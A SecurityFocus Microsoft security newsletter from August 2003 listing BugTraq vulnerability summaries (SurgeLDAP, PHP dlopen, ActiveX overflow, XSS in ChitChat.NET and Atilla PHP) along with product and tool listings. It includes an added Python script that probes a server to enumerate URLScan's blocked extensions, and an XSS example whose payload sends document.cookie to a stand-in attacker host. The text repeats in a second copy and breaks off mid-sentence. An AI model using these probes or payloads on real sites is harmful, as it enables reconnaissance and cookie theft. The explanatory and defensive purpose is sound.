SecurityFocus Microsoft Newsletter # 151
----------------------------------------
This Issue is Sponsored by: KaVaDo
Your network firewall and IDS products do not prevent Web application
attacks - the most common form of online exploitation- resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner,
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without
compromising business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/sponsor/KaVaDo_ms-secnews_030825
I. FRONT AND CENTER
1. Slow Down Internet Worms With Tarpits
2. Penetration Testing for Web Applications (Part Three)
II. MICROSOFT VULNERABILITY SUMMARY
1. PHP DLOpen Memory Disclosure Vulnerability
2. SurgeLDAP Path Disclosure Vulnerability
3. SurgeLDAP User.CGI Cross-Site Scripting Vulnerability
4. SurgeLDAP HTTP GET Denial Of Service Vulnerability
5. SurgeLDAP Insecure Password Storage Vulnerability
6. Microsoft MCIWNDX.OCX ActiveX Control Buffer Overflow Vulner...
7. Clickcess ChitChat.NET Message HTML Injection Vulnerability
8. Microsoft URLScan / RSA Security SecurID Configuration Enume...
9. Atilla PHP Content Management System Multiple Web Vulnerabil...
III. MICROSOFT FOCUS LIST SUMMARY
1. Patch testing (Thread)
2. Patch Management Best Practices E-Seminar (Thread)
3. Article Announcement: Slow Down Internet Worms With ... (Thread)
4. MS03-033 not signed by Microsoft? (Thread)
5. DCOM patch + Exchange (Thread)
6. Mail from MSN Messenger (Thread)
7. scan of domain logon reveals unknown port (Thread)
8. SecurityFocus Microsoft Newsletter # 150 (Thread)
9. Article Announcement: MRTG for Intrusion Detection w... (Thread)
10. Why the shutdown if infected with blaster? (Thread)
11. DNS (Thread)
12. Account Lockout -- ARGH (Thread)
13. Account Lockuout --ARGH (Thread)
14. Detecting Blaster (Thread)
15. New variant. Blast.b (Thread)
16. FW: Actions for the Blaster Worm - Special Edition, ... (Thread)
17. MS03-029 ?-Download link (Thread)
18. FW: Blaster vs. Kaht2, detecting Windows root kits (Thread)
19. Administrivia: Blaster (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. Sophos Anti-Virus
2. F-Secure Policy Manager
3. Gordano Messaging Suite
4. LANDesk Management Suite 7
5. McAfee ePolicy Orchestrator
6. Enterprise Manager
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. Password Manager XP v1.5
2. beecrypt v3.1.0
3. Anti-Spam SMTP Proxy v1.0.0
4. ngrep v1.41
5. Securepoint Firewall and VPN Server v3.1.3 P3
6. libdvdcss v1.2.8
VI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Slow Down Internet Worms With Tarpits
By Tony Bautts
This timely article discusses how to slow the spread of Internet worms
using a tarpit and iptables on Linux. A similar approach could potentially
be used with tarpits on Windows platforms, Solaris, OpenBSD, and others.
http://www.securityfocus.com/infocus/1723
2. Penetration Testing for Web Applications (Part Three)
By Jody Melbourne and David Jorm
The third and final article in this series investigates session security
issues and cookies, buffer overflows and logic flaws, and provides links
to further resources for the web application penetration tester. ... >>
http://www.securityfocus.com/infocus/1722
II. MICROSOFT VULNERABILITY SUMMARY
-----------------------------------
1. PHP DLOpen Memory Disclosure Vulnerability
BugTraq ID: 8405
Remote: No
Date Published: Aug 13 2003 12:00AM
Relevant URL: http://www.securityfocus.com/bid/8405
Summary:
PHP (originally "Personal Home Page", now "PHP: Hypertext Preprocessor") is
a web application development suite. It is available for the Unix, Linux,
and Microsoft platforms.
A vulnerability has been reported in PHP's use of the dlopen() function.
The issue occurs when PHP runs as a module of the Apache web server. It has
been reported possible to dump the contents of the Apache process memory
into a text file. A local attacker (for example, a user on a shared hosting
system who is allowed to run PHP scripts) could harness this issue to gain
access to potentially sensitive information, which could include
authentication credentials. Other attacks, such as causing the server to
deliver content other than what it is configured to serve, may also be
possible.
It should be noted that dlopen() is the C library call the PHP interpreter
uses to load extension modules; it is not a PHP language function. Hosting
providers that do not need runtime extension loading commonly disable it by
setting enable_dl = Off in php.ini.
2. SurgeLDAP Path Disclosure Vulnerability
BugTraq ID: 8406
Remote: Yes
Date Published: Aug 13 2003 12:00AM
Relevant URL: http://www.securityfocus.com/bid/8406
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to a path disclosure vulnerability. It is possible to
gain access to sensitive path information by issuing an HTTP GET request
for an invalid resource. This could help a remote attacker enumerate the
layout of the file system of the host running the vulnerable software,
which may be useful in further attacks against the host.
This issue exists in the web server component of SurgeLDAP.
3. SurgeLDAP User.CGI Cross-Site Scripting Vulnerability
BugTraq ID: 8407
Remote: Yes
Date Published: Aug 13 2003 12:00AM
Relevant URL: http://www.securityfocus.com/bid/8407
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to cross-site scripting attacks. The issue exists in
the user.cgi script and is due to insufficient sanitization of data
supplied via URI parameters, which is echoed back to users. Remote
attackers may exploit this issue by enticing a user to visit a malicious
link that specifies hostile HTML and script code as the value of the 'cmd'
parameter of the vulnerable script. This code may be rendered in the
user's browser when the link is visited, in the security context of the
site hosting the SurgeLDAP web interface.
Successful exploitation may allow theft of cookie-based authentication
credentials or other attacks.
This issue exists in the web server component of SurgeLDAP.
4. SurgeLDAP HTTP GET Denial Of Service Vulnerability
BugTraq ID: 8408
Remote: Yes
Date Published: Aug 13 2003 12:00AM
Relevant URL: http://www.securityfocus.com/bid/8408
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to a denial of service vulnerability that may occur
when an overly long HTTP GET request is sent to the server. Though
unconfirmed, this may result in memory corruption, which may be further
exploitable to execute arbitrary code. It is reported that an HTTP GET
request of 501 or more characters will trigger this condition.
This issue exists in the web server component of SurgeLDAP.
5. SurgeLDAP Insecure Password Storage Vulnerability
BugTraq ID: 8409
Remote: No
Date Published: Aug 13 2003 12:00AM
Relevant URL: http://www.securityfocus.com/bid/8409
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP does not adequately secure password credentials. These
credentials will be stored on the system hosting the server in plaintext
and could be exposed to users with local access to the system. On
Microsoft Windows, these credentials are reported to be stored in the
'user.dat' file in the program directory.
6. Microsoft MCIWNDX.OCX ActiveX Control Buffer Overflow Vulner...
BugTraq ID: 8413
Remote: Yes
Date Published: Aug 13 2003 12:00AM
Relevant URL: http://www.securityfocus.com/bid/8413
Summary:
The 'mciwndx.ocx' ActiveX control is included in Microsoft Visual Studio 6
and supports multimedia programming.
'mciwndx.ocx' has been reported prone to a buffer overflow vulnerability.
The issue reportedly presents itself when excessive data (more than 640
kB) is passed to the "filename" property.
It has been conjectured that this issue could potentially lead to the
execution of code with the privileges of the user executing the web
browser. This problem requires that a user with the vulnerable control
installed visit a web page that invokes the control in a manner sufficient
to trigger the issue. Upon doing so, it may be possible to create a
remotely exploitable stack overflow condition that results in the
overwriting of sensitive process memory. This, however, has not been
confirmed.
It should be noted that ActiveX controls by nature might contain latent
vulnerabilities. Caution should be employed if installing ActiveX
controls. An administrator who wants to stop Internet Explorer from
instantiating a specific control can set its "kill bit" (the Compatibility
Flags value 0x400 under the ActiveX Compatibility registry key for the
control's CLSID), a mechanism Microsoft documents in Knowledge Base
article 240797.
7. Clickcess ChitChat.NET Message HTML Injection Vulnerability
BugTraq ID: 8417
Remote: Yes
Date Published: Aug 13 2003 12:00AM
Relevant URL: http://www.securityfocus.com/bid/8417
Summary:
Clickcess ChitChat.NET is a discussion forum designed specifically for use
with SQL Server and implemented in ASP.NET. It is available for Microsoft
Windows.
A vulnerability has been reported in the software that may allow
unsanitized user input to be injected into the website. This problem is
related to the Name and Topic Title input fields, which fail to properly
filter HTML and script code. Injected HTML code may be rendered in the
web browser of a victim who views vulnerable areas of the site. This would
occur in the security context of the site hosting ChitChat.NET.
This vulnerability could be exploited to steal cookie-based authentication
credentials from users who view the injected content. Other attacks may
well be possible.
8. Microsoft URLScan / RSA Security SecurID Configuration Enume...
BugTraq ID: 8419
Remote: Yes
Date Published: Aug 14 2003 12:00AM
Relevant URL: http://www.securityfocus.com/bid/8419
Summary:
Microsoft URLScan is an Internet Server API (ISAPI) filter that can be
configured to block a variety of HTTP methods, file extension access, and
other queries.
SecurID, a two-factor authentication mechanism developed by RSA Security,
can also be used to prevent unauthorized access to a website.
A weakness has been discovered in Microsoft URLScan and RSA Security
SecurID when used in conjunction on a web server. The problem is said to
occur due to the order in which the products are placed within the global
ISAPI filter list.
When the vulnerable configuration is in place, an attacker may be capable
of enumerating the Microsoft URLScan extension filtering list by making
repeated requests to files with differing extensions. This is because the
web server incorrectly returns a page containing a hidden form field whose
NAME is 'referrer' and whose VALUE contains 'Rejected-By-UrlScan', the
default URL that URLScan rewrites rejected requests to. It should be noted
that if the default configuration has been changed (the RejectResponseUrl
setting in URLScan.ini), the rejection string may differ, so any probe
must be keyed to the string actually in use.
The enumeration of this type of information could potentially aid an
attacker when launching further attacks against the target web server.
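The enumeration the advisory describes, written out as an added example (not code from the advisory or from either vendor): each probe requests a non-existent file with a candidate extension, and the response is classified by whether its hidden 'referrer' field carries the URLScan rejection marker. The responses below are constructed, not captured from a real server, and the layout of the login page (a hidden 'referrer' input holding the originally requested URL) is an assumption about the SecurID web agent; the probe path name and the sample_fetch helper are likewise assumptions for illustration.

```python
from html.parser import HTMLParser

# URLScan rewrites a rejected request to /<Rejected-By-UrlScan> unless
# RejectResponseUrl in URLScan.ini has been changed, so the marker is a parameter.
DEFAULT_MARKER = "Rejected-By-UrlScan"


class _HiddenFieldParser(HTMLParser):
    """Collects name -> value for every <input type="hidden"> in a page."""

    def __init__(self):
        super().__init__()
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = {k: (v or "") for k, v in attrs}
        if a.get("type", "").lower() == "hidden" and "name" in a:
            self.hidden[a["name"].lower()] = a.get("value", "")


def rejected_by_urlscan(body, marker=DEFAULT_MARKER):
    """True when the page carries a hidden 'referrer' field whose value holds the
    URLScan rejection marker, i.e. the SecurID filter answered for a request that
    URLScan, running later in the ISAPI filter chain, had already rejected."""
    p = _HiddenFieldParser()
    p.feed(body)
    return marker in p.hidden.get("referrer", "")


def enumerate_blocked_extensions(fetch, extensions, marker=DEFAULT_MARKER):
    """Probe one non-existent file per extension and report which extensions
    URLScan rejects. fetch(path) must return the response body as a string; in
    practice wrap an HTTP client, here it is a dictionary lookup (assumption)."""
    blocked = []
    for ext in extensions:
        if rejected_by_urlscan(fetch("/urlscan-probe" + ext), marker):
            blocked.append(ext)
    return blocked


# Constructed sample responses (not real captures). A rejected probe comes back
# with the rewritten URL in the hidden field; an allowed one keeps the probe URL.
REJECTED_PAGE = """<html><body><form method="post" action="/login">
<input type="hidden" name="referrer" value="/&lt;Rejected-By-UrlScan&gt;">
<input type="text" name="username"><input type="password" name="passcode">
</form></body></html>"""

NORMAL_PAGE = """<html><body><form method="post" action="/login">
<input type="hidden" name="referrer" value="/urlscan-probe.htm">
<input type="text" name="username"><input type="password" name="passcode">
</form></body></html>"""

SAMPLE_RESPONSES = {
    "/urlscan-probe.exe": REJECTED_PAGE,
    "/urlscan-probe.ida": REJECTED_PAGE,
}


def sample_fetch(path):
    """Stand-in for a real HTTP client, backed by the constructed responses."""
    return SAMPLE_RESPONSES.get(path, NORMAL_PAGE)


if __name__ == "__main__":
    print(enumerate_blocked_extensions(sample_fetch, [".asp", ".exe", ".htm", ".ida"]))
```

Because the check keys on the hidden field rather than on a status code, it still works when both the rejected and the allowed case return an HTTP 200 login page, which is exactly what makes this configuration leak information. If RejectResponseUrl has been changed, pass the site's own string as `marker`.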
9. Atilla PHP Content Management System Multiple Web Vulnerabil...
BugTraq ID: 8437
Remote: Yes
Date Published: Aug 18 2003 12:00AM
Relevant URL: http://www.securityfocus.com/bid/8437
Summary:
Atilla PHP is a PHP content management system designed for portal sites.
It is available for Unix, Linux, and Microsoft Windows platforms.
Several problems have been identified in Atilla PHP. Because of these
issues, an attacker may be able to gain access to sensitive information,
or execute code in the browsers of victims in the security context of the
vulnerable site.
Three problems have been identified in Atilla PHP.
Atilla PHP is vulnerable to a cross-site scripting issue. The index.php3
script does not properly filter input supplied to the Rubrique and article
URI variables.
Atilla PHP is also vulnerable to a script injection issue. The
user_action.php3 script does not properly filter user input, making it
possible to insert HTML and script that will be stored in a place where it
can be executed in the browsers of victims.
Finally, Atilla PHP is vulnerable to path disclosure issues in the
index.php3 script. By supplying a single quotation mark as the value of
the id, nrub, or article variable of the index.php3 script, it is possible
to gain information about the installation path of the software.
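The SurgeLDAP user.cgi 'cmd' issue, the ChitChat.NET Name and Topic Title fields and the Atilla PHP index.php3 and user_action.php3 issues above all come down to untrusted input being written into a page without encoding. The following added example (not code from any of those products) shows the flaw and its fix side by side in Python: one value is echoed into page text, the other lands inside an attribute, and the hardened version HTML-encodes both at output time. The payloads, page fragments and the live_markup_count check are constructed for illustration.

```python
import html

# Constructed payloads of the kind the advisories describe (not real exploits).
# The first targets a text context, the second an attribute context, which is
# why quote=True in html.escape matters below.
SCRIPT_PAYLOAD = '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_unsafe(cmd, title):
    """Mirrors the flaw: a URI parameter (cmd) is echoed into the page text and a
    stored field (title) is placed inside an attribute, both without encoding."""
    return (f'<p>Unknown command: {cmd}</p>\n'
            f'<a href="/topic" title="{title}">topic</a>')


def render_safe(cmd, title):
    """Hardened form: HTML-encode every untrusted value at the point of output.
    quote=True also turns the double quote into &quot;, so a stored title can
    no longer close the attribute and start an event handler."""
    return (f'<p>Unknown command: {html.escape(cmd, quote=True)}</p>\n'
            f'<a href="/topic" title="{html.escape(title, quote=True)}">topic</a>')


def live_markup_count(page):
    """Constructed check: count script tags and attribute break-outs that reach
    the browser as markup rather than as inert text."""
    return page.count("<script") + page.count('" onmouseover="')


if __name__ == "__main__":
    print(render_unsafe(SCRIPT_PAYLOAD, ATTR_PAYLOAD))
    print(render_safe(SCRIPT_PAYLOAD, ATTR_PAYLOAD))
```

Encoding on output is the fix rather than stripping "dangerous" tags on input: the encoder knows the context the value is written into, whereas an input filter has to guess every way a browser might reinterpret the stored string, which is how the stored variants (ChitChat.NET, Atilla user_action.php3) keep working after a naive filter is added.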
III. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. Patch testing (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334432
2. Patch Management Best Practices E-Seminar (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334430
3. Article Announcement: Slow Down Internet Worms With ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334407
4. MS03-033 not signed by Microsoft? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334403
5. DCOM patch + Exchange (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334251
6. Mail from MSN Messenger (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/334249
7. scan of domain logon reveals unknown port (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333826
8. SecurityFocus Microsoft Newsletter # 150 (Thread)
Relevant URL:
16. FW: Actions for the Blaster Worm - Special Edition, ... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333529
17. MS03-029 ?-Download link (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333516
18. FW: Blaster vs. Kaht2, detecting Windows root kits (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333498
19. Administrivia: Blaster (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/333482
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
----------------------------------------
1. Sophos Anti-Virus
By: Sophos
Platforms: AIX, DOS, FreeBSD, HP-UX, Linux, MacOS, Netware, OS/2, Solaris,
UNIX, VMS, Windows 3.x, Windows 95/98, Windows NT
Relevant URL: http://www.sophos.com/products/sav/
Summary:
Sophos Anti-Virus is a unique solution to the virus problem, providing
true cross-platform protection in a single, fully integrated product. The
network-centric design provides a host of benefits for the protection of
servers, workstations and portables. Sophos's ground-breaking architecture
maximises protection, while minimising performance and administrative
overheads.
2. F-Secure Policy Manager
By: F-Secure Corporation
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.f-secure.com/products/policy-man/index.shtml
Summary:
With F-Secure Policy Manager, your system administrator can manage all the
critical security applications from antivirus protection to file and
network encryption from one single console. The administrator can
automatically and remotely install, configure and update the applications.
It is possible to manage the security applications on almost any device
and across the enterprise so that even the security of mobile workers'
laptops is guaranteed. In addition to all this, the administrator can
easily monitor the network by generating extensive reports on the security
status of the network.
3. Gordano Messaging Suite
By: Gordano
Platforms: AIX, Linux, Solaris, Windows 2000, Windows NT, Windows XP
Relevant URL: http://www.gordano.com/
Summary:
Gordano's Messaging Suite provides robust and secure email, instant and
SMS messaging for small, medium and large businesses.
4. LANDesk Management Suite 7
By: LANDesk Software
Platforms: AIX, HP-UX, Linux, MacOS, Solaris, Windows 2000, Windows 95/98,
Windows NT, Windows XP
Relevant URL: http://www.landesk.com/products/ilms/
Summary:
LANDesk Management Suite 7 is a comprehensive, integrated management
solution that's easy to use. Enabling proactive management of desktops,
server and mobile devices across heterogeneous IT environments.
- Keep up with security patches and virus updates
- Efficiently install and maintain software on the desktop
- Decrease software license costs and respond to audits
- Reduce the cost of helpdesk support
- Discover and manage hardware and software assets
- Migrate many users and their profiles to new operating systems
5. McAfee ePolicy Orchestrator
By: Network Associates
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL:
http://www.nai.com/us/products/mcafee/antivirus/fileserver/epo.htm
Summary:
McAfee Security ePolicy Orchestrator (ePO) is the market-leading tool for
centralized policy management of malicious threat protection. ePO allows
you to maintain up-to-date protection, configure and enforce policies, and
generate detailed graphical reports on McAfee Security and third party
products, including Symantec and Dr Ahn anti-virus products.
6. Enterprise Manager
By: Sophos
Platforms: Windows 2000, Windows NT
Relevant URL: http://www.sophos.com/products/em/
Summary:
The Enterprise Manager suite is a powerful set of tools allowing fully
automated web-based installation and updating of Sophos software across a
network and even to remote users.
Network administrators are put in full control and can monitor their
network at all times. Unprotected computers or those running an
out-of-date version of Sophos Anti-Virus can be immediately and
automatically updated. In practice, a network of 1000 or more clients can
be updated from a single, central Windows machine within five minutes.
V. NEW TOOLS FOR MICROSOFT PLATFORMS
------------------------------------
1. Password Manager XP v1.5
By: CP-Lab
Relevant URL: http://www.cp-lab.com
Platforms: Windows 2000, Windows 95/98, Windows NT, Windows XP
Summary:
Password Manager XP is a program that helps you to systematize any secret
information stored on your PC. It will be your keeper of passwords and
secrets. Protect your private data with this password management utility.
Password Manager XP allows you to create several databases for storing
your secret information. Each database has an access password and is
encrypted with several algorithms at the same time (Blowfish, 3DES,
Rijndael, Tea, Cast128, RC4, Serpent, Twofish). You can store data in
different databases under your own passwords. You can create password
databases on a shared resource and access them from multiple computers
across the network. An "Install to removable device" wizard will help you
install Password Manager XP on removable devices such as USB flash
drives. It is easily integrated into Microsoft Internet Explorer and helps
you to surf the Web more safely. Password Manager XP has a built-in
password generator with many adjustable functions.
2. beecrypt v3.1.0
By: Bob Deblier, bob.deblier (at) pandora (dot) be
Relevant URL: http://sourceforge.net/projects/beecrypt/
Platforms: Linux, Solaris, UNIX, Windows 2000, Windows 95/98, Windows NT
Summary:
BeeCrypt is an ongoing project to provide strong and fast cryptography in
the form of a toolkit usable by commercial and open source projects.
Included in the library are entropy sources, random generators, block
ciphers, hash functions, message authentication codes, multiprecision
integer routines, and public key primitives.
3. Anti-Spam SMTP Proxy v1.0.0
By: John Hanna
Relevant URL: http://assp.sourceforge.net/
Platforms: BSDI, Linux, MacOS, Os Independent, OS/2, Perl (any system
supporting perl), POSIX, Windows 2000, Windows NT
Summary:
The Anti-Spam SMTP Proxy (ASSP) Server project aims to create an open
source platform independent SMTP Proxy server which implements whitelists
and Bayesian filtering to help stop unsolicited commercial email (UCE).
Anti-spam tools should be adaptive to new spam and customized for each
site's email patterns. This easy to use tool works with any mail transport
and achieves these goals requiring no operator intervention after the
initial setup phase.
4. ngrep v1.41
By: Jordan Ritter <jpr5 (at) darkridge (dot) com>
Relevant URL: http://ngrep.sourceforge.net/
Platforms: AIX, Digital UNIX/Alpha, FreeBSD, IRIX, Linux, OpenBSD,
Solaris, Windows 2000, Windows 95/98, Windows NT
Summary:
ngrep strives to provide most of GNU grep's common features, applying them
to the network layer. ngrep is a pcap-aware tool that will allow you to
specify extended regular expressions to match against the data payloads of
packets. It currently recognizes TCP and UDP across Ethernet, PPP and SLIP
interfaces, and understands BPF filter logic in the same fashion as more
common packet sniffing tools like tcpdump and snoop.
5. Securepoint Firewall and VPN Server v3.1.3 P3
By: Lutz Hausmann
Relevant URL: http://www.securepoint.cc/
Platforms: Linux, Windows 2000, Windows 95/98, Windows NT
Summary:
Securepoint Firewall and VPN Server is a high-performance application
designed to offer full protection for network assets. The Security Manager
offers a graphical user interface with many features, different
configurations, and advanced reporting functions. The Securepoint server
is a complete firewall and VPN software system with an operating system
based on a secure Linux. VPN operation supports PPTP and IPSec (X.509
certificates, preshared, RSA signature). You can use the firewall on a
standard PC with 2 to 16 network cards (including Ethernet, ADSL, ISDN).
It is very easy to install and administer. The Securepoint Security
Manager is available in English, German, and Spanish, and works in online
and offline mode.
6. libdvdcss v1.2.8
By: Samuel Hocevar <sam (at) zoy (dot) org>
Relevant URL: http://www.videolan.org/libdvdcss/
Platforms: BeOS, FreeBSD, Linux, OpenBSD, Windows 2000, Windows 95/98,
Windows NT
Summary:
libdvdcss is a cross-platform library for transparent DVD device access
with on the fly CSS decryption. It currently runs under Linux, FreeBSD,
NetBSD, OpenBSD, BSD/OS, Solaris, BeOS, Win98, Win2k and MacOS X. It is
used for the vlc DVD player because of its portability and because, unlike
similar libraries, it does not require your DVD drive to be region-locked.
VI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: KaVaDo
Your network firewall and IDS products do not prevent Web application
attacks - the most common form of online exploitation- resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner,
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without
compromising business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/sponsor/KaVaDo_ms-secnews_030825
SecurityFocus Microsoft Newsletter # 151
----------------------------------------
This Issue is Sponsored by: KaVaDo
Your network firewall and IDS products do not prevent Web application
attacks - the most common form of online exploitation- resulting in Web
defacement, data theft, sabotage and fraud.
KaVaDo is the first and only company that provides a complete and
integrated suite of Web application security products, allowing you to:
- assess your entire Web environment with a Web Application Scanner,
- automatically set positive security policies for real-time protection,
and
- maintain such policies at the Application Firewall without
compromising business performance.
For more information on KaVaDo and to download a FREE white paper on
Security Policy Automation for Web Applications, please visit
http://www.securityfocus.com/sponsor/KaVaDo_ms-secnews_030825
------------------------------------------------------------------------
-------
I. FRONT AND CENTER
1. Slow Down Internet Worms With Tarpits
2. Penetration Testing for Web Applications (Part Three)
II. MICROSOFT VULNERABILITY SUMMARY
1. PHP DLOpen Memory Disclosure Vulnerability
2. SurgeLDAP Path Disclosure Vulnerability
3. SurgeLDAP User.CGI Cross-Site Scripting Vulnerability
4. SurgeLDAP HTTP GET Denial Of Service Vulnerability
5. SurgeLDAP Insecure Password Storage Vulnerability
6. Microsoft MCIWNDX.OCX ActiveX Control Buffer Overflow Vulner...
7. Clickcess ChitChat.NET Message HTML Injection Vulnerability
8. Microsoft URLScan / RSA Security SecurID Configuration Enume...
9. Atilla PHP Content Management System Multiple Web Vulnerabil...
III. MICROSOFT FOCUS LIST SUMMARY
1. Patch testing (Thread)
2. Patch Management Best Practices E-Seminar (Thread)
3. Article Announcement: Slow Down Internet Worms With ... (Thread)
4. MS03-033 not signed by Microsoft? (Thread)
5. DCOM patch + Exchange (Thread)
6. Mail from MSN Messenger (Thread)
7. scan of domain logon reveals unknown port (Thread)
8. SecurityFocus Microsoft Newsletter # 150 (Thread)
9. Article Announcement: MRTG for Intrusion Detection w... (Thread)
10. Why the shutdown if infected with blaster? (Thread)
11. DNS (Thread)
12. Account Lockout -- ARGH (Thread)
13. Account Lockuout --ARGH (Thread)
14. Detecting Blaster (Thread)
15. New variant. Blast.b (Thread)
16. FW: Actions for the Blaster Worm - Special Edition, ... (Thread)
17. MS03-029 ?-Download link (Thread)
18. FW: Blaster vs. Kaht2, detecting Windows root kits (Thread)
19. Administrivia: Blaster (Thread)
IV. NEW PRODUCTS FOR MICROSOFT PLATFORMS
1. Sophos Anti-Virus
2. F-Secure Policy Manager
3. Gordano Messaging Suite
4. LANDesk Management Suite 7
5. McAfee ePolicy Orchestrator
6. Enterprise Manager
V. NEW TOOLS FOR MICROSOFT PLATFORMS
1. Password Manager XP v1.5
2. beecrypt v3.1.0
3. Anti-Spam SMTP Proxy v1.0.0
4. ngrep v1.41
5. Securepoint Firewall and VPN Server v3.1.3 P3
6. libdvdcss v1.2.8
VI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Slow Down Internet Worms With Tarpits
By Tony Bautts
This timely article discusses how to slow the spread of Internet worms
using a tarpit and IPtables on Linux. A similar approach could potenially
be used with tarpits on Windows platforms, Solaris, OpenBSD, and others.
http://www.securityfocus.com/infocus/1723
2. Penetration Testing for Web Applications (Part Three)
By Jody Melbourne and David Jorm
The third and final article in this series investigates session security
issues and cookies, buffer overflows and logic flaws, and provides links
to further resources for the web application penetration tester. ... >>
http://www.securityfocus.com/infocus/1722
II. MICROSOFT VULNERABILITY SUMMARY
-----------------------------------
1. PHP DLOpen Memory Disclosure Vulnerability
BugTraq ID: 8405
Remote: No
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8405
Summary:
PHP is the Personal Home Page web application development suite. It is
available for the Unix, Linux, and Microsoft platforms.
A vulnerability has been reported to present itself in the dlopen()
function contained in the PHP source. The issue occurs when PHP is used in
conjunction with the Apache web server. It has been reported possible to
dump the contents of the Apache process memory into a text file. This
issue could be harnessed by a local attacker to gain access to potentially
sensitive information which could include authentication credentials.
Other exploits such as allowing an attacker to deliver different content
other than what the server is configured to serve, may also be possible.
It should be noted that dlopen() is a function contained in the PHP
source. It is not a PHP language function.
2. SurgeLDAP Path Disclosure Vulnerability
BugTraq ID: 8406
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8406
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to a path disclosure vulnerability. It is possible to
gain access to sensitive path information by issuing an HTTP GET request
for an invalid resource. This could help a remote attacker enumerate the
layout of the file system of the host running the vulnerable software,
which may be useful in further attacks against the host.
This issue exists in the web server component of SurgeLDAP.
3. SurgeLDAP User.CGI Cross-Site Scripting Vulnerability
BugTraq ID: 8407
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8407
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to cross-site scripting attacks. The issue exists in
the user.cgi script and is due to insufficient sanitization of data
supplied via URI parameters, which will be echoed back to users. Remote
attackers may exploit this issue by enticing a user to visit a malicious
link that specifies hostile HTML and script code as a value for the 'cmd'
parameter of the vulnerable script. This code may be rendered in the
user's browser when the link is visited. This would occur in the context
of the server.
Successful exploitation may allow theft of cookie-based authentication
credentials or other attacks.
This issue exists in the web server component of SurgeLDAP.
4. SurgeLDAP HTTP GET Denial Of Service Vulnerability
BugTraq ID: 8408
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8408
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP is prone to a denial of service vulnerability that may occur
when an overly long HTTP GET request is sent to the server. Though
unconfirmed, this may result in memory corruption, which may be further
exploitable to execute arbitrary code. It is reported that an HTTP GET
request of 501 or more characters will trigger this condition.
This issue exists in the web server component of SurgeLDAP.
5. SurgeLDAP Insecure Password Storage Vulnerability
BugTraq ID: 8409
Remote: No
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8409
Summary:
SurgeLDAP is an LDAP server implementation. It is available for a number
of platforms including Microsoft Windows and Linux/Unix variants.
SurgeLDAP does not adequately secure password credentials. These
credentials will be stored on the system hosting the server in plaintext
and could be exposed to users with local access to the system. On
Microsoft Windows, these credentials are reported to be stored in the
'user.dat' file in the program directory.
6. Microsoft MCIWNDX.OCX ActiveX Control Buffer Overflow Vulner...
BugTraq ID: 8413
Remote: Yes
Date Published: Aug 13 2003 12:00A
Relevant URL: http://www.securityfocus.com/bid/8413
Summary:
The 'mciwndx.ocx' ActiveX control is included in Microsoft Visual Studio 6
and supports multimedia programming.
'mciwndx.ocx' has been reported prone to a buffer overflow vulnerability.
The issue reportedly presents itself when excessive data (more than 640
kB) is passed to the "filename" property.
It has been conjectured that this issue could potentially lead to the
execution of code with the privileges of the user executing the web
browser. This problem requires that a user with the vulnerable control
installed visit a web page that invokes the control in a manner sufficient
to trigger the issue. Upon doing so, it may be possible to create a
remotely exploitable stack overflow condition that results in the
overwriting of sensitive process memory. This, however, has not been
confirmed.
It should be noted, that ActiveX controls by nature might contain latent
